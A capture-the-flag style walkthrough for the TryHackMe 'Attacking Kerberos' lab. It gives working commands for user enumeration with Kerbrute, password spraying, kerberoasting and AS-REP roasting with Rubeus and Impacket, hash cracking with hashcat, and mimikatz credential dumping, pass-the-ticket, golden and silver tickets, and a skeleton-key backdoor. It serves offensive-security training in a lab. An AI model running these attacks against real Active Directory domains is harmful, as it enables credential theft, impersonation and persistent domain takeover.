Attacking Kerberos
Room Link: https://tryhackme.com/room/attackingkerberos
Presteps for Lab
Kerbrute Installation
Download a precompiled binary for your OS - https://github.com/ropnop/kerbrute/releases
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute && chmod +x kerbrute Impacket Installation
wget https://github.com/fortra/impacket/archive/refs/tags/impacket_0_9_19.tar.gz
tar xvf impacket_0_9_19.tar.gz
cd /root/impacket-impacket_0_9_19
pip install .Download wordlists
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txtAdd hostname to host file
echo $VICTIM CONTROLLER.local >> /etc/hosts
cat /etc/hosts
Enumeration w/ Kerbrute
This will brute force user accounts from a domain controller using a supplied wordlist
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt
Harvesting & Brute-Forcing Tickets w/ Rubeus
Login with provided credentials
Kali
ssh Administrator@$VICTIM
Password: P@$$W0rdHarvest tickets with Rubeus
Victim
cd Downloads
Rubeus.exe harvest /interval:30
This will take a given password and "spray" it against all found users then give the .kirbi TGT for that user
Victim
echo $VICTIM CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
cd Downloads
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting w/ Rubeus & Impacket
Kerberoasting #1 - Rubeus
This will dump the Kerberos hash of any kerberoastable users.
Victim
cd Downloads
Rubeus.exe kerberoast
Copy the hashes from the command prompt onto the attacker machine and put it into a .txt file so we can crack it with hashcat. Below command removes all the tabs and formats it properly for hashcat. If you don't format it properly than hashcat will error out.
Kali
cat hashes.txt | sed 's/[[:space:]]//g' |tr -d '\n' | sed 's/$krb5tgs$23$*/\n&/g' > hash.txt
hashcat -m 13100 -a 0 hash.txt Pass.txtHashcat found the passwords for both of the hashes.
hashcat -m 13100 -a 0 hash.txt Pass.txt --show
Kerberoasting #2 - Impacket
sudo python3.9 /root/test/impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.226.108 -request > hashes.txt
Hashes were found for the same two accounts when doing this with Rubeus.
hashcat -m 13100 -a 0 hashes.txt Pass.txt
hashcat -m 13100 -a 0 hashes.txt Pass.txt --show
AS-REP Roasting w/ Rubeus
Victim
cd Downloads
Rubeus.exe asreproast
Kali
Transfer the hash from the target machine over to kali and put the hash into a txt file. Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User... .The below command does the replace and clean up the output so hashcat can recognize the hashes.
cat hashes.txt | sed 's/[[:space:]]//g' |tr -d '\n'| sed 's/$krb5asrep/\n&/g' | sed 's/$krb5asrep/$krb5asrep$23/g' > hash.txt
hashcat -m 18200 hash.txt Pass.txtBoth passwords cracked.
hashcat -m 18200 hash.txt Pass.txt --show
Pass the Ticket w/ mimikatz
Prepare Mimikatz & Dump Tickets
Victim
cd Downloads
mimikatz.exeVictim - Mimikatz
privilege::debug
sekurlsa::tickets /export
Pass the Ticket w/ Mimikatz
Run this command inside of mimikatz with the ticket that you harvested from earlier. It will cache and impersonate the given ticket
Victim - Mimikatz
kerberos::ptt [0;2b4efc]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
Here were just verifying that we successfully impersonated the ticket by listing our cached ticket.
Victim
klist
You now have impersonated the ticket giving you the same rights as the TGT you're impersonating. To verify this we can look at the admin share.
Victim
dir \\$VICTIM\admin$
Golden/Silver Ticket Attacks w/ mimikatz
Victim
cd downloads && mimikatz.exeThis will dump the hash as well as the security identifier needed to create a Golden Ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
Victim - Mimikatz
privilege::debug
lsadump::lsa /inject /name:krbtgt
Create a Golden/Silver Ticket
A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket, you would dump any service or domain admin ticket. This will provide you with the service/domain admin account's SID or security identifier that is a unique identifier for each user account, as well as the NTLM hash. You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information.
Golden Ticket
This is the command for creating a golden ticket.
Victim - Mimikatz
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 Silver Ticket
This is the command for creating a golden ticket as well but to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.
Victim - Mimikatz
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:1103Use the Golden/Silver Ticket to access other machines
misc::cmdNTLM hash of Administrator
lsadump::lsa /inject /name:Administrator 
NTLM hash of SQLService
lsadump::lsa /inject /name:SQLService 
Kerberos Backdoors w/ mimikatz
Victim
cd Downloads && mimikatz.exeVictim - Mimikatz
privilege::debug
misc::skeleton
Victim
Last updated